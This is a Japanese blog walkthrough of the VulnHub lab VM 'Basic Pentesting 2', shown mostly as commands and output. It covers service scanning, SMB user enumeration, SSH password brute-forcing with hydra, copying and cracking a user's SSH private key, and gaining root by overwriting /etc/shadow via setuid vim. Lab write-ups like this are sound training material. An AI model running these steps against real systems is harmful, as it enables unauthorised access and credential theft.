vulnhub Basic Pentesting 2 雑記
Basic pentesting 2
圧縮されたファイルを開くとovaファイルが出てきたが、ovaを読み込むだけでは内部ネットワークにリンクアップしてくれなかった。
この設定環境での話
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
電源付けたり消したりする場合は自動設定する必要がある。
サービス調査
# nmap -Pn -p- 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00011s latency). Not shown: 65529 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds # nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00081s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.7 MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
気になりどころ
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
- [port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 8009] ajp13 Apache Jserv (Protocol v1.3)
- [port 8080] http Apache Tomcat 9.0.7
今回は春のApache祭りですか。
詳細
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
いつだかも「Username Enumeration」しかねーじゃんってなった気がする。
ブルートフォースアタックはスマートじゃないので無し。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.11 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.11 + Target Hostname: 10.10.10.11 + Target Port: 80 + Start Time: 2020-05-04 23:48:50 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + OSVDB-3268: /development/: Directory indexing found. + OSVDB-3092: /development/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 7863 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-04 23:49:15 (GMT-4) (25 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.11 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 4 23:49:46 2020 URL_BASE: http://10.10.10.11/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11/ ---- ==> DIRECTORY: http://10.10.10.11/development/ + http://10.10.10.11/index.html (CODE:200|SIZE:158) + http://10.10.10.11/server-status (CODE:403|SIZE:299) ---- Entering directory: http://10.10.10.11/development/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Mon May 4 23:49:50 2020 DOWNLOADED: 4612 - FOUND: 2 # dirb http://10.10.10.11/development/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 4 23:50:03 2020 URL_BASE: http://10.10.10.11/development/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11/development/ ---- ----------------- END_TIME: Mon May 4 23:50:07 2020 DOWNLOADED: 4612 - FOUND: 0
「/development」が怪しい。
# curl http://10.10.10.11 <html> <h1>Undergoing maintenance</h1> <h4>Please check back later</h4> <!-- Check our dev note section if you need to know what to work on. --> </html>
「/development/」に、「dev.txt」と「j.txt」を発見。
# curl http://10.10.10.11/development/dev.txt 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J # curl http://10.10.10.11/development/j.txt For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K
Apache Struts?
「struts」とは「Apache Struts」のこと?
であるならば、「Apache Struts 2.5.12」を使っているということになりそう。
# searchsploit apache (snip) Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
exploit codeは見つかったけどターゲットが分からんので保留。
+ # -*- coding: utf-8 -*- # pip install requests
K曰くJのパスワードハッシュが脆弱?
/etc/shadowへのディレクトリトラバーサルの示唆を感じたが分からなかった。
[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# smbclient -L 10.10.10.11 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) SMB1 disabled -- no workgroup available
このSambaは「Samba Server 4.3.11-Ubuntu」
そういえば、smbclient上手くいったことなかったけど匿名ログインが有効の時しか上手くいかないのでは。
# enum4linux 10.10.10.11 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 00:25:23 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.11 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none (snip) ===================================== | OS information on 10.10.10.11 | ===================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.11 from smbclient: [+] Got OS info for 10.10.10.11 from srvinfo: BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu platform_id : 500 os version : 6.1 server type : 0x809a03 (snip) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User) ============================================ | Getting printer info for 10.10.10.11 | ============================================ No printers returned. enum4linux complete on Tue May 5 00:25:38 2020
「kay」と「jan」でログイン試行上手くいかず。
hudraにはユーザがいないと言われた。
exploitはローカルじゃないと上手くいかないぽいので断念。
分からん。
[port 8009] ajp13 Apache Jserv (Protocol v1.3)
こいつ自体はあまり注目せず、Tomcatを確認すべき?
[port 8080] http Apache Tomcat 9.0.7
# nikto -h 10.10.10.11 -p 8080 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.11 + Target Hostname: 10.10.10.11 + Target Port: 8080 + Start Time: 2020-05-05 00:49:02 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + /manager/html: Default Tomcat Manager / Host Manager interface found + /host-manager/html: Default Tomcat Manager / Host Manager interface found + /manager/status: Default Tomcat Server Status interface found + 8169 requests: 0 error(s) and 12 item(s) reported on remote host + End Time: 2020-05-05 00:49:33 (GMT-4) (31 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.11:8080 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 5 00:49:59 2020 URL_BASE: http://10.10.10.11:8080/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11:8080/ ---- + http://10.10.10.11:8080/docs (CODE:302|SIZE:0) + http://10.10.10.11:8080/examples (CODE:302|SIZE:0) + http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630) + http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0) + http://10.10.10.11:8080/manager (CODE:302|SIZE:0) ----------------- END_TIME: Tue May 5 00:50:03 2020 DOWNLOADED: 4612 - FOUND: 5
とりあえず「/manager/html」にhydraしておく。
(結果長すぎて諦め)
でも、PUTできるってことは本命はそっちなんだろうか。
いや。PUT出来んかった。
よく分からんのでsshに辞書する
janのパスワード弱いって何だったんだ。未だに分からん。
sshやってみるぐらいしかないかなぁ。
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. (snip) [22][ssh] host: 10.10.10.11 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33
え~、パスワードハッシュ弱いってsshの辞書攻撃で良かったんかぁ。
# ssh jan@10.10.10.11 The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts. jan@10.10.10.11's password: (snip) Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102 jan@basic2:~$ id uid=1001(jan) gid=1001(jan) groups=1001(jan) jan@basic2:~$ sudo -l [sudo] password for jan: Sorry, user jan may not run sudo on basic2.
sudo 許されず。
apacheのパスワードファイル見つからんなぁ。
jan@basic2:/home/kay$ ls -al /home/jan/ total 12 drwxr-xr-x 2 root root 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 root jan 47 Apr 23 2018 .lesshst jan@basic2:/home/kay$ ls -al /home/kay/ total 48 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 kay kay 756 Apr 23 2018 .bash_history -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc drwx------ 2 kay kay 4096 Apr 17 2018 .cache -rw------- 1 root kay 119 Apr 23 2018 .lesshst drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful -rw------- 1 root kay 538 Apr 23 2018 .viminfo -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
なんだかkayのディレクトリは充実しているな。
あれ、sshあるってことはログインできるかもしれない。
jan@basic2:/home/kay$ ls -al ./.ssh total 20 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 . drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .. -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys -rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey jan@10.10.10.11's password: id_rsa 100% 3326 293.3KB/s 00:00 # ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
パスワード必要か。
# ls /usr/share/john/ | grep ssh ssh2john.py # /usr/share/john/ssh2john.py sshkey > kayssh # john --wordlist=/usr/share/wordlists/rockyou.txt kayssh Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (sshkey) Warning: Only 1 candidate left, minimum 2 needed for performance. 1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos! Session completed
はい、これでいけますね。
# ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0777 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
ローカルに落としたprivatekeyだとログインだめらしいので、janで改めてログインしてからsshログイン。
jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11 Could not create directory '/home/jan/.ssh'. The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts). Enter passphrase for key './.ssh/id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ sudo -l [sudo] password for kay: Sorry, try again. [sudo] password for kay: sudo: 1 incorrect password attempt
そういや、kayのパスワード知らんからrootまでいかんね。
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$
さっきは見えなかったけどこれなんだ。
kay@basic2:~$ cat .bash_history ls -al cat pass.bak cat /dev/null > .bash_history sudo su ls -al cat /dev/null > .bash_history cd /tmp ls -al cd /home/jan ls -al sudo less .viminfo sudo cat /dev/null > .viminfo sudo rm .viminfo less .lesshst sudo less .lesshst cd /home/kay/ ls -al less .bash less .bash_history exit /bin/less /etc/shadow which /bin/less /bin/less /bin/less /etc/passwd sh sudo chmod u-s /bin/less /bin/less ls -al /bin/les ls -al /bin/less sudo chmod u-s /bin/nc.traditional which nc.traditional ls -al /bin/nc* find / -perm -u=s -type f 2>/dev/null which vim sudo chmod u+s /usr/bin/vim ls -al /usr/bin/vim vim /etc/passwd ls -al ls -al /bin/vim vim /etc/shadow vim /etc/passwd cat /etc/passwd vi /etc/passwd cat /etc/passwd ls -al /etc/passwd ifconfig exit
こいつ、/etc/shadowさわれんじゃん。
と思ったが、sudoが必要だったぽい。
いや、でも「sudo chmod u+s /usr/bin/vim」、ここでvimにsetuidしてるぞ。
kay@basic2:~$ openssl passwd -1 pass $1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9. kay@basic2:~$ vim /etc/shadow kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
shadowのkayのパスワードを書き換えてしまえ。
:wq!で文句言われるけどsetuidのおかげで反映できちゃうんだよなぁ。
pass.bakの真実
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
kayのパスワードだった。
おまけ
root@basic2:/home/kay# cd /root root@basic2:~# ls flag.txt root@basic2:~# cat flag.txt Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all! If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators. Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me. Happy hacking!
終わり
- johnのコマンド登録されていないモジュールが「/usr/share/john」にあった 。
- apacheパスワードからのアプローチがあるんじゃないかと思ったのだが。